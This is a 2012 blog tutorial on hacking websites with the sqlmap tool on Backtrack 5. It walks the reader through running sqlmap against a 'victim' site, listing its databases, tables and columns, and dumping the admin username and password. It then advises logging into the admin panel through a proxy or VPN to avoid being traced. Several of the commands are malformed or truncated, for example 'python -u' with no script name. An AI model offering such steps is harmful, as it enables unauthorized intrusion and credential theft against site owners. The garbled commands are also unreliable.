Thursday, 29 November 2012

Hack website using Backtrack (sqlmap)

In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool. 

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. (well I already have vulnerable site) 
sql map 2
3. Now type this command in the terminal and hit enter.(refer above figure)
python -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website 
sql map 3
Well I got the two database aj and information_schema we will select aj database. 

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python -u http://www.yourvictim' -D aj –tables

sql map 4
7. Now you will get the tables list which is stored in aj database. 
sql map 5

8. Now lets grab the columns from the admin table 
python -u http://www.yourvictim' -T admin --columns
sql map 7
Now we got the columns and we got username and password 
9. Now lets grab the passwords of the admin
python -u http://www.yourvictim' -T admin -U test --dump
Now we got the username and the password of the website ! 
sql map 9
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

No comments:

Post a Comment